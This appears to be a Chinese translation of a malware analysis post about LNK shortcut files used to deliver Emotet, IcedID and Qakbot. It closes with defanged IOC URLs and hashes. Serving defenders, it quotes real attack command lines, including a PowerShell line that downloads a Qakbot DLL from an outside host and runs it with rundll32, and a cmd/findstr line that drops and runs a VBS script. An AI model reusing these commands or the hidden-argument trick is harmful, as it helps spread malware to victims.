发布于2022年11月4日3年前 LNK 类恶意软件兴起 LNK 文件是 Windows 平台下的快捷方式,是打开文件、文件夹或者应用程序的“指针”。LNK 文件为 Shell Link 二进制文件格式,其中包含用于访问另一个数据对象的信息。LNK 文件可以使用标准方式通过右键单击手动创建,也可以使用应用程序自动创建。许多工具都可以构建 LNK 文件,甚至包括恶意目的的工具 lnkbombs。2022 年第二季度,McAfee 发现 LNK 类恶意软件有所增长。攻击者通过 LNK 文件的易用性,传播 Emotet、Qakbot、IcedID、Bazarloaders 等恶意软件。LNK 恶意软件全球分布LNK 快捷方式在普通用户眼里如下所示:LNK 视图威胁与攻击活动随着微软默认禁用 Office 宏,攻击者正在增强攻击手段,包括利用 LNK 文件实现攻击意图。攻击者通过垃圾邮件或者恶意 URL 将 LNK 文件投递给受害者,这些文件通常会操纵 PowerShell、CMD 和 MSHTA 等合法应用程序下载恶意文件。Emotet感染链感染链威胁分析携带 LNK 的电子邮件上图中,可以看到诱饵消息与 LNK 附件文件。用户点击 LNK 文件,即可触发感染。该 LNK 文件的属性如下所示:LNK 文件属性如上所示,LNK 调用 cmd.exe 执行命令。在属性页中最多可见 255 个字符,但实际命令行执行的参数最长可达 4096 个字符。攻击者利用这一差异,使长参数在属性中不可见。本例中的参数为 /v:on /c findstr “glKmfOKnQLYKnNs.*” “Form 04.25.2022, US.lnk” > “%tmp%\YlScZcZKeP.vbs” & “%tmp%\YlScZcZKeP.vbs”。LNK 文件内容一旦 findstr.exe 接收到字符串,LNK 文件的其余内容将保存在 %temp% 文件夹下的 .VBS 文件中,随机文件名称为 YIScZcZKeP.vbs。cmd.exe 紧接着调用 wscript.exe 加载 VBS 文件下载 Emotet 的 64 位 DLL 文件。下载的 DLL 文件通过 REGSVR32.EXE 进行执行,这与 Excel 的 Emotet 样本相类似。ICEDID感染链ICEDID 感染链威胁分析LNK 文件通过 Powershell 执行高度混淆的参数,如下所示:ICEDID 样本属性参数非常长,在属性中不完全可见。运行时会将混淆参数解密,然后通过 hxxps://hectorcalle[.]com/093789.hta执行 MSHTA。下载的 HTA 文件调用另一个具有类似混淆参数的 PowerShell,再拉取 hxxps://hectorcalle[.]com/listbul.exe。QAKBOT感染链QAKBOT 感染链威胁分析QAKBOT 样本属性完整的参数为 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoExit iwr -Uri hxxps://news-wellness.com/5MVhfo8BnDub/D.png -OutFile $env:TEMP\test.dll;Start-Process rundll32.exe $env:TEMP\test.dll,jhbvygftr。PowerShell 会利用 Invoke-WebRequest 命令下载hxxps://news-wellness.com/5MVhfo8BnDub/D.png保存到 %temp% 文件夹下。DLL 文件即为 Qakbot,然后使用 rundll32 执行。结论在最近活跃的攻击行动中,攻击者滥用 Windows 快捷方式 LNK 文件发起攻击。LNK 也会与 PowerShell、CMD、MSHTA 等文件结合使用,实现完整攻击。IOC02eccb041972825d51b71e88450b094cf692b9f5f46f5101ab3f2210e2e1fe7124ee20d7f254e1e327ecd755848b8b72cd5e6273cf434c3a520f780d5a098ac9b5d5464d4c2b231b11b594ce8500796f8946f1b3a10741593c7b872754c2b172hxxps://creemo[.]pl/wp-admin/ZKS1DcdquUT4Bb8Kb/hxxp://filmmogzivota[.]rs/SpryAssets/gDR/hxxp://demo34.ckg[.]hk/service/hhMZrfC7Mnm-9JD/hxxp://focusmedica[.]in/fmlib/IxBABMh0I2cLM3qq1GVv/hxxp://cipro[.]mx/prensa/siZP69rBFmibDvuTP1/hxxps://hectorcalle[.]com/093789.htahxxps://hectorcalle[.]com/listbul.exehxxps://green-a-thon[.]com/LosZkUvr/B.png
创建帐户或登录后发表意见